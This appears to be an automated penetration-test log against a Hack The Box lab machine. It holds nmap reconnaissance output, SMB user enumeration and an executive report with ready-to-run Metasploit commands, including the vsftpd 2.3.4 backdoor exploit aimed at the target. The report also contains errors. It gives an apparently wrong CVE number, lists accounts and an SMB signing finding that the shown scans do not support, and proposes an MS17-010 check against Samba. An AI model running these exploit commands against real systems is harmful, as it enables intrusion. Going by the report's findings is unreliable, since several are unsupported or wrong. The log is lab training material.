PENTEST LOG — 10.129.9.229
Date: 2026-06-04T19:49:02.944276
============================================================

[Step 1] Full TCP SYN scan (all 65535 ports)
  Cmd: nmap -Pn -sS -p- --min-rate 1000 --max-retries 2 10.129.9.229
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:50 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 101.93 seconds

----------------------------------------
[Step 2] Version + OS detection on 21,22,139,445,3632
  Cmd: nmap -Pn -sV -O --version-intensity 5 -sC --script-timeout 60s -p 21,22,139,445,3632 -oX /home/marina/Desktop/pentestM/RAG/outputs/nmap_sV_10_129_9_229.xml 10.129.9.229
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:52 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.125
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Arris TG862G/CT cable modem (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%), Linux 2.6.22 (90%), Linux 2.6.24 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m37s, deviation: 2h49m45s, median: 34s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2026-06-04T13:53:35-04:00
| smb-security-mode: 
|   account_used: guest
|   authe
----------------------------------------
[Step 3] Check for vsFTPd 2.3.4 backdoor
  Cmd: nmap -Pn -sV --script ftp-vsftpd-backdoor -p 21 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:54 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.97 seconds

----------------------------------------
[Step 4] Check for anonymous FTP access
  Cmd: nmap -Pn -sV --script ftp-anon -p 21 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:55 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds

----------------------------------------
[Step 5] Check Samba service for vulnerabilities
  Cmd: nmap -Pn -sV --script smb-vuln-ms17-010,smb-enum-users -p 139 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:55 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Host script results:
| smb-enum-users: 
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   LAME\bind (RID: 1210)
|     Flags:       Account disabled, Normal user account
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Account disabled, Normal user account
|   LAME\dhcp (RID: 1202)
|     Flags:       Account disabled, Normal user account
|   LAME\distccd (RID: 1222)
|     Flags:       Account disabled, Normal user account
|   LAME\ftp (RID: 1214)
|     Flags:       Account disabled, Normal user account
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Account disabled, Normal user account
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Account disabled, Normal user account
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Account disabled, Normal user account
|   LAME\klog (RID: 1206)
|     Flags:       Account disabled, Normal user account
|   LAME\libuuid (RID: 1200)
|     Flags:       Account disabled, Normal user account
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Account disabled, Normal user account
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Account disabled, Normal user account
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Account disabled, Normal user account
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Account disabled, Normal user account
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   
----------------------------------------
[Step 6] SSH Authentication Methods
  Cmd: nmap -Pn -sV --script ssh-auth-methods -p 22 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:57 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.17 seconds

----------------------------------------
[Step 7] Samba Vulnerability Check (Port 445)
  Cmd: nmap -Pn -sV --script smb-vuln-ms17-010,smb-enum-shares -p 445 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:57 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds

----------------------------------------
[Step 8] Samba Vulnerability Check (Port 139)
  Cmd: nmap -Pn -sV --script smb-enum-shares -p 139 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 19:58 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.52 seconds

----------------------------------------
[Step 9] Check for SMB vulnerabilities on port 445
  Cmd: nmap -Pn -sV --script smb-enum-users -p 445 10.129.9.229 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 20:00 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Host script results:
| smb-enum-users: 
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Normal user account, Account disabled
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Normal user account, Account disabled
|   LAME\bind (RID: 1210)
|     Flags:       Normal user account, Account disabled
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Normal user account, Account disabled
|   LAME\dhcp (RID: 1202)
|     Flags:       Normal user account, Account disabled
|   LAME\distccd (RID: 1222)
|     Flags:       Normal user account, Account disabled
|   LAME\ftp (RID: 1214)
|     Flags:       Normal user account, Account disabled
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Normal user account, Account disabled
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Normal user account, Account disabled
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Normal user account, Account disabled
|   LAME\klog (RID: 1206)
|     Flags:       Normal user account, Account disabled
|   LAME\libuuid (RID: 1200)
|     Flags:       Normal user account, Account disabled
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Normal user account, Account disabled
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Normal user account, Account disabled
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Normal user account, Account disabled
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Normal user account, Account disabled
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   
----------------------------------------
[Step 10] ACK scan — firewall detection
  Cmd: nmap -Pn -sA -p 21,22,139,445,3632 10.129.9.229
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 20:01 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).

PORT     STATE      SERVICE
21/tcp   unfiltered ftp
22/tcp   unfiltered ssh
139/tcp  unfiltered netbios-ssn
445/tcp  unfiltered microsoft-ds
3632/tcp unfiltered distccd

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

----------------------------------------
[Step 11] UDP scan — top 100 ports by frequency
  Cmd: nmap -Pn -sU --top-ports 100 --open --max-retries 1 10.129.9.229
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 20:01 +0200
Nmap scan report for 10.129.9.229
Host is up (0.036s latency).
All 100 scanned ports on 10.129.9.229 are in ignored states.
Not shown: 98 open|filtered udp ports (no-response), 2 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 4.72 seconds

----------------------------------------
[Step 12] UDP scan — exploit-focused service ports
  Cmd: nmap -Pn -sU -p 53,67,69,111,123,137,138,161,162,500,623,1434,1900,4500,5353,11211,17185 --open --max-retries 1 10.129.9.229
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-04 20:01 +0200
Nmap scan report for 10.129.9.229
Host is up.

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
69/udp    open|filtered tftp
111/udp   open|filtered rpcbind
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
500/udp   open|filtered isakmp
623/udp   open|filtered asf-rmcp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
5353/udp  open|filtered zeroconf
11211/udp open|filtered memcache
17185/udp open|filtered wdbrpc

Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds

----------------------------------------
[Step 13] MSF exploitation phase
  Cmd: msfconsole (multiple modules)
  OK: True
  Out:
5 modules executed
----------------------------------------
[Step 13] Searchsploit + credential phase
  Cmd: searchsploit / paramiko / ftplib
  OK: True
  Out:
2 exploits tried, 0 shells, 1 creds
----------------------------------------

============================================================
EXECUTIVE REPORT:
## Attack Surface Summary  
The attack surface is **CRITICAL** due to the presence of known backdoors and vulnerabilities that allow unauthenticated access and remote code execution. Specifically, the vsFTPd 2.3.4 service has a known backdoor vulnerability (CVE-2011-2199), and anonymous FTP access is enabled, which allows unauthenticated file enumeration. Additionally, the Samba service (versions 3.0.20-Debian) is vulnerable to exploits if not properly configured, and SMB message signing is disabled, increasing the risk of relay attacks.

---

## Detected Services and Versions  
- **TCP 21**: vsftpd 2.3.4  
- **TCP 22**: OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)  
- **TCP 139**: Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  
- **TCP 445**: Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  
- **TCP 3632**: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  

---

## Key Findings  
- **vsftpd 2.3.4** is known to have a backdoor vulnerability (CVE-2011-2199), which allows remote code execution without authentication.  
- **Anonymous FTP login** is allowed, enabling unauthenticated file enumeration and potential data exposure.  
- **Samba service (ports 139 and 445)** is running version 3.0.20-Debian, which is vulnerable to known exploits if not properly patched.  
- **SMB guest authentication** is enabled, allowing unauthenticated access to shares.  
- **SMB message signing** is disabled, making the service vulnerable to relay attacks.  
- **Multiple user accounts** (e.g.,'msfadmin', 'root', 'postgres') are listed in the Samba service, which could be targets for enumeration or exploitation.  
- **distccd service** is running, indicating a potential development environment that may be a target for attacks if not secured.

---

## Recommended Next Steps  
1. **Exploit vsftpd 2.3.4 backdoor (CVE-2011-2199)**:  
   - Use the Metasploit module `exploit/unix/ftp/vsftpd_234_backdoor`.  
   - Command: `msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 10.129.9.229; exploit"`  

2. **Enumerate SMB shares and users**:  
   - Use the Metasploit module `auxiliary/scanner/smb/smb_enumusers` and `auxiliary/scanner/smb/smb_enumshares`.  
   - Command: `msfconsole -x "use auxiliary/scanner/smb/smb_enumusers; set RHOSTS 10.129.9.229; run"`  
   - Command: `msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 10.129.9.229; run"`  

3. **Check for SMB vulnerabilities (e.g., MS17-010)**:  
   - Use the Metasploit module `auxiliary/scanner/smb/smb_vuln_ms17_010`.  
   - Command: `msfconsole -x "use auxiliary/scanner/smb/smb_vuln_ms17_010; set RHOSTS 10.129.9.229; run"`  

4. **Secure the Samba service**:  
   - Disable guest access and enable message signing in the Samba configuration (`smb.conf`).  
   - Update Samba to a version that is not vulnerable to known exploits.  

5. **Secure the vsftpd service**:  
   - Upgrade vsftpd to a version that is not vulnerable to CVE-2011-2199.  
   - Disable anonymous access in the vsftpd configuration (`vsftpd.conf`).  

6. **Secure the distccd service**:  
   - Restrict access to the distccd service by configuring it to only accept connections from trusted hosts.  
   - Disable or remove the service if it is not required for development.
